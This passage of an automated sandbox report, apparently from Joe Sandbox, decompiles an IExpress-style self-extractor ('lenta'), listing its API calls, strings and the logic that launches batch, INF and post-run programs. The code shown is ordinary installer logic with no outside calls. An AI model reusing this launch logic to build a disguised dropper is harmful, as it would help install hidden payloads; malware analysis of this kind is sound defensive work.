									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00071781( &_v276, 0x104, _t130, 0x78c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E0007468F(_t130, 0x79a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x00073baa
0x00073bb0
0x00073bb7
0x00073bc0
0x00073bc2
0x00073bc9
0x00073bcb
0x00073bcf
0x00073bd3
0x00073bd9
0x00073bfd
0x00073bfd
0x00073bff
0x00073c03
0x00073c03
0x00073c11
0x00073c16
0x00073c19
0x00073c28
0x00000000
0x00000000
0x00073c30
0x00073c39
0x00073c40
0x00073d13
0x00073d15
0x00073d21
0x00073d26
0x00000000
0x00073c4f
0x00073c56
0x00073c60
0x00073c65
0x00073c77
0x00073c78
0x00073c7c
0x00073c7e
0x00073c82
0x00073c82
0x00000000
0x00073c7c
0x00073c67
0x00073c69
0x00073c6d
0x00000000
0x00073c58
0x00073c58
0x00073c6e
0x00073c6e
0x00073c87
0x00073c89
0x00073d4d
0x00073d4f
0x00073d50
0x00073d52
0x00073d9e
0x00073da8
0x00073daf
0x00073db4
0x00073db6
0x00073f4d
0x00073f4d
0x00073f4f
0x00073f56
0x00073f57
0x00073f58
0x00073f63
0x00073f63
0x00073dbc
0x00073dc0
0x00073dc2
0x00073de6
0x00073de6
0x00073de8
0x00073f0b
0x00073f0b
0x00073f0f
0x00073f13
0x00073f15
0x00073f1a
0x00073f1c
0x00073f46
0x00073f47
0x00000000
0x00073f47
0x00073f1e
0x00073f1f
0x00073f25
0x00073f26
0x00073f2a
0x00073f2d
0x00073fd9
0x00073fd9
0x00073fda
0x00073fda
0x00073fe1
0x00073fe3
0x00073fe3
0x00073fe8
0x00000000
0x00073fe8
0x00073f33
0x00073f37
0x00000000
0x00073f37
0x00073dee
0x00073dee
0x00073df5
0x00073fad
0x00073fb9
0x00073fc2
0x00073fc8
0x00000000
0x00073fc8
0x00073dfb
0x00073dfd
0x00000000
0x00000000
0x00073e03
0x00073e0a
0x00000000
0x00000000
0x00073e15
0x00073e17
0x00073e19
0x00073f94
0x00073fa4
0x00073f7c
0x00073f80
0x00073f8b
0x00000000
0x00073f8b
0x00073e2c
0x00073e30
0x00073e34
0x00073e36
0x00073f69
0x00073f6e
0x00073f70
0x00073f76
0x00000000
0x00073f76
0x00073e3c
0x00073e43
0x00073e47
0x00073e52
0x00073e56
0x00073e5c
0x00073e61
0x00073e68
0x00073e70
0x00073e74
0x00073e7c
0x00073e80
0x00073e82
0x00073e82
0x00073e87
0x00073e87
0x00073e8b
0x00073e91
0x00073e94
0x00073e96
0x00073e96
0x00073e9b
0x00073e9b
0x00073e9f
0x00073ea2
0x00073ea4
0x00073ea4
0x00073ea9
0x00073ea9
0x00073ead
0x00073eb3
0x00073eb6
0x00073eb8
0x00073eb8
0x00073ebd
0x00073ebd
0x00073ec1
0x00073ec3
0x00073ec5
0x00073ec5
0x00073eca
0x00073eca
0x00073ece
0x00073ed5
0x00073ed9
0x00073ee0
0x00073ee6
0x00073eea
0x00073eec
0x00073eee
0x00073ef3
0x00073ef3
0x00073ef5
0x00073efa
0x00073efb
0x00073efd
0x00073f40
0x00000000
0x00073eff
0x00073eff
0x00073f05
0x00000000
0x00073f05
0x00073efd
0x00073dc7
0x00073dce
0x00000000
0x00000000
0x00073dd0
0x00073dd7
0x00000000
0x00000000
0x00073dd9
0x00073ddb
0x00000000
0x00000000
0x00073ddd
0x00073de1
0x00000000
0x00073de1
0x00073d59
0x00073d65
0x00073d6a
0x00073d6c
0x00000000
0x00000000
0x00073d6e
0x00073d75
0x00000000
0x00000000
0x00073d8f
0x00073d96
0x00073d98
0x00000000
0x00000000
0x00000000
0x00073d98
0x00073c8f
0x00073c98
0x00073cf1
0x00073cf3
0x00000000
0x00000000
0x00073cfe
0x00073d11
0x00000000
0x00000000
0x00000000
0x00073d11
0x00073c9c
0x00073ca5
0x00073ca7
0x00000000
0x00000000
0x00073cad
0x00073cb2
0x00073cb7
0x00073cc5
0x00000000
0x00000000
0x00073ce8
0x00073cec
0x00073ced
0x00073ced
0x00000000
0x00073ce8
0x00073c9e
0x00000000
0x00073c9e
0x00073c56
0x00073d35
0x00073d35
0x00073d3c
0x00073d48
0x00000000
0x00073d48
0x00073c03
0x00073be2
0x00073be7
0x00073bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 00073C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00073CDC

Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746A0
Part of subcall function 0007468F: SizeofResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746A9
Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746C3
Part of subcall function 0007468F: LoadResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746CC
Part of subcall function 0007468F: LockResource.KERNEL32(00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746D3
Part of subcall function 0007468F: memcpy_s.MSVCRT ref: 000746E5
Part of subcall function 0007468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000746EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00078C42), ref: 00073D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00073E26
FreeLibrary.KERNEL32(00000000,?,00078C42), ref: 00073EFF
LocalFree.KERNEL32(?,?,?,?,00078C42), ref: 00073F1F
FreeLibrary.KERNEL32(00000000,?,00078C42), ref: 00073F40
LocalFree.KERNEL32(?,?,?,?,00078C42), ref: 00073F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00078C42), ref: 00073F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00078C42), ref: 00073F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00078C42), ref: 00073FC2

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00073E74
lenta, xrefs: 00073E68
REBOOT, xrefs: 00073BE2
D, xrefs: 00073C19
DoInfInstall, xrefs: 00073E1F, 00073E24, 00073F68
SHOWWINDOW, xrefs: 00073C34
ADMQCMD, xrefs: 00073C9E
<None>, xrefs: 00073CC9, 00073D7D
advpack.dll, xrefs: 00073F9D
POSTRUNPROGRAM, xrefs: 00073D60
USRQCMD, xrefs: 00073CAD
RUNPROGRAM, xrefs: 00073D05

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
API String ID: 1032054927-2789099190
Opcode ID: f3031905bbb66c5f7951899c7239c1d14b28d781b7f906f9f0746578addd2852
Instruction ID: e798be6d1f7e7274de351bd8d4c9582df3368b39356f805233457068ea16a10b
Opcode Fuzzy Hash: f3031905bbb66c5f7951899c7239c1d14b28d781b7f906f9f0746578addd2852
Instruction Fuzzy Hash: C7B1F070E083419BF3709F249845BAB76E4EB85740F00C929FA8DE61D1DB7C8981DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00071AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00071AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x78004; // 0xdaa0d862
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00071680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00071A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00071781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
					E0007658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00071680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E000766C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E000766C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00071680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00071781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E000716B3( &_v1552, 0x400, " ");
										E000716B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00072AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0007171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00071A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00071A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E000744B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x79120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x71140, _t156, 8,  &_v268) == 0) {
										 *0x79a34 =  *0x79a34 & 0xfffffffb;
										if( *0x79a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0007171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x79a34 =  *0x79a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00071680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00071680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00076CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x00071af3
0x00071afa
0x00071b07
0x00071b09
0x00071b1a
0x00071b20
0x00071b2c
0x00071b3b
0x00071b40
0x00071b2e
0x00071b2e
0x00071b33
0x00071b33
0x00071b46
0x00071b4c
0x00071b52
0x00071b57
0x00071b5d
0x00071b61
0x00071b9f
0x00071b9f
0x00071bb1
0x00071bc2
0x00000000
0x00071b63
0x00071b63
0x00071b65
0x00071b68
0x00071b68
0x00071b6a
0x00071b6b
0x00071b6f
0x00071b74
0x00000000
0x00000000
0x00071b76
0x00071b7b
0x00071b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00071b8c
0x00071b8c
0x00071b98
0x00071bc7
0x00071bc9
0x00071bcc
0x00071bd3
0x00071d75
0x00071d76
0x00071d78
0x00071d7f
0x00071e05
0x00071e09
0x00000000
0x00000000
0x00071e12
0x00071e1b
0x00071e73
0x00071e21
0x00071e21
0x00071e28
0x00071e37
0x00071e3e
0x00071e52
0x00071e60
0x00071e60
0x00071e3e
0x00071e79
0x00071e7b
0x00071e84
0x00000000
0x00071d9b
0x00071d9b
0x00071da0
0x00071da2
0x00071da5
0x00071da5
0x00071da7
0x00071da8
0x00071dac
0x00071dae
0x00071db4
0x00071db7
0x00071db7
0x00071db9
0x00071dba
0x00071dbe
0x00071dc3
0x00071dce
0x00071dd2
0x00071deb
0x00000000
0x00071df0
0x00000000
0x00071dd2
0x00071bf7
0x00071bfe
0x00071c07
0x00071d55
0x00071d5a
0x00071d5b
0x00071d5d
0x00071d5e
0x00000000
0x00071c1b
0x00071c1b
0x00071c20
0x00071c2c
0x00071c33
0x00071c38
0x00071c3a
0x00071c3a
0x00071c40
0x00071c4b
0x00071c4b
0x00071c5d
0x00071c61
0x00071dd4
0x00071dd4
0x00071dd6
0x00071ddb
0x00071ddc
0x00071dde
0x00071d64
0x00071d64
0x00071d67
0x00071d6c
0x00000000
0x00071c67
0x00071c67
0x00071c6d
0x00071c72
0x00071c74
0x00071c74
0x00071c8e
0x00071c99
0x00071cc0
0x00071cf8
0x00071d07
0x00071d23
0x00071d09
0x00071d14
0x00071d1b
0x00071d1b
0x00071d2b
0x00071d2d
0x00071d2d
0x00071d38
0x00071d39
0x00071d46
0x00071cc2
0x00071cc2
0x00071ccc
0x00071cce
0x00071cce
0x00071cdb
0x00071ce6
0x00071cee
0x00071cee
0x00071e89
0x00071e91
0x00071e92
0x00071e94
0x00071e97
0x00071ea4
0x00071ea4
0x00071c61
0x00071c07
0x00071bd3
0x00071b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00071BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00071BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00071C57
GetPrivateProfileIntA.KERNEL32 ref: 00071C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00071140,00000000,00000008,?), ref: 00071CB8
GetShortPathNameA.KERNEL32 ref: 00071D1B

Part of subcall function 000744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
Part of subcall function 000744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00074554

Strings

rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00071D3B
.BAT, xrefs: 00071D83
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00071BA0
setupx.dll, xrefs: 00071D14
Reboot, xrefs: 00071C82
Version, xrefs: 00071CB3
.INF, xrefs: 00071BDB
AdvancedINF, xrefs: 00071CAE
Command.com /c %s, xrefs: 00071D9B, 00071DE8
setupapi.dll, xrefs: 00071D23, 00071D3A
DefaultInstall, xrefs: 00071C74, 00071C87, 00071CCE, 00071CD3, 00071D2D, 00071D39
", xrefs: 00071B25

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-472070384
Opcode ID: 097f37fd81262358d3232907b2ac83fec7b490aba2e17ed9351327dc411dd0dc
Instruction ID: fca4dfd630bb7e50d4489b08ce5d570f0f7413fe30d67dfe0935ba5669604220
Opcode Fuzzy Hash: 097f37fd81262358d3232907b2ac83fec7b490aba2e17ed9351327dc411dd0dc
Instruction Fuzzy Hash: 41A14C70E002186BEB709B2CCC45BEA77A99B91310F14C2A5E55DA72C1DBBC9DC5CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0007597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0007597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x78004; // 0xdaa0d862
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x79124 = E00076285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E000744B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x79a34 & 0x00000008;
							if(( *0x79a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x79a38; // 0x0
								_t110 =  *((intOrPtr*)(0x789e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x79124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0007268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x79a38; // 0x0
							_t110 =  *((intOrPtr*)(0x789e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x789e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x79a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E000744B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x79124 = E00076285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E000744B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x79124 = E00076285();
					_t66 = 0;
					L33:
					return E00076CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x0007597d
0x00075988
0x0007598f
0x0007599a
0x000759a6
0x000759a8
0x000759af
0x000759b9
0x000759dd
0x000759e4
0x000759f1
0x000759fe
0x00075a0b
0x00075a13
0x00075a19
0x00075a1b
0x00075ba1
0x00075baf
0x00075bbd
0x00075bd8
0x00075bde
0x00075be3
0x00075bec
0x00075bf0
0x00075bfc
0x00075c02
0x00075c02
0x00075c02
0x00075c04
0x00075c04
0x00000000
0x00075c04
0x00075a27
0x00075a3a
0x00075a46
0x00075a48
0x00075a4a
0x00000000
0x00000000
0x00075a64
0x00075a6a
0x00075a6c
0x00075abc
0x00075ac2
0x00075ac9
0x00075aca
0x00075aca
0x00075acc
0x00075acc
0x00075acf
0x00075ad1
0x00000000
0x00000000
0x00075ad3
0x00075ad6
0x00075ad8
0x00000000
0x00000000
0x00075ada
0x00075adc
0x00075add
0x00075add
0x00075ae0
0x00000000
0x00000000
0x00000000
0x00075ae0
0x00075ae2
0x00075ae4
0x00075ae6
0x00075ae6
0x00075ae6
0x00075ae9
0x00075aeb
0x00075af0
0x00075af6
0x00075af8
0x00075af9
0x00075af9
0x00075afb
0x00000000
0x00000000
0x00075afd
0x00075aff
0x00075b00
0x00075b03
0x00000000
0x00000000
0x00000000
0x00075b03
0x00075b05
0x00075b08
0x00075b20
0x00075b27
0x00075b52
0x00075b52
0x00075b5b
0x00075b62
0x00075b6b
0x00075b6d
0x00075b76
0x00075b7d
0x00075b83
0x00075b7f
0x00075b7f
0x00075b7f
0x00075b6f
0x00075b72
0x00075b72
0x00075b85
0x00075b98
0x00075b9e
0x00075b87
0x00075b8f
0x00075b8f
0x00000000
0x00075b85
0x00075b29
0x00075b33
0x00000000
0x00000000
0x00075b35
0x00075b48
0x00075b4a
0x00000000
0x00075b4a
0x00075b0f
0x00075b16
0x00000000
0x00075b16
0x00075a7c
0x00075a8a
0x00075aa5
0x00075aab
0x00000000
0x000759bb
0x000759c0
0x000759c7
0x000759d1
0x000759d6
0x00075c05
0x00075c14
0x00075c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000759A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 000759AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00075A13
MulDiv.KERNEL32(?,?,00000400), ref: 00075A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00075A64
memset.MSVCRT ref: 00075A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00075A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00075AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00075BFC

Part of subcall function 000744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
Part of subcall function 000744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00074554

Part of subcall function 00076285: GetLastError.KERNEL32(00075BBC), ref: 00076285

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: 16a89f1458cb526c56dc1c1c80569296e04bde5887f8c1cae4c304c73043f8c3
Instruction ID: 2a2c28f38edbf74370c91888fd096d427a7a7607c1b63d6fe33fd5b1fae6625f
Opcode Fuzzy Hash: 16a89f1458cb526c56dc1c1c80569296e04bde5887f8c1cae4c304c73043f8c3
Instruction Fuzzy Hash: B271A6B1E0060CAFEB659B20CC85BFA77ACEB48341F4484A9F50DE6141D77C9E858B65

Uniqueness

Uniqueness Score: -1.00%

Function 00074FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00074FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x79144 = E0007468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x79140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x78584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x78584, 0x841), 5); // executed
				}
				_t10 = E00074EFD(0, 0); // executed
				if(_t10 != 0) {
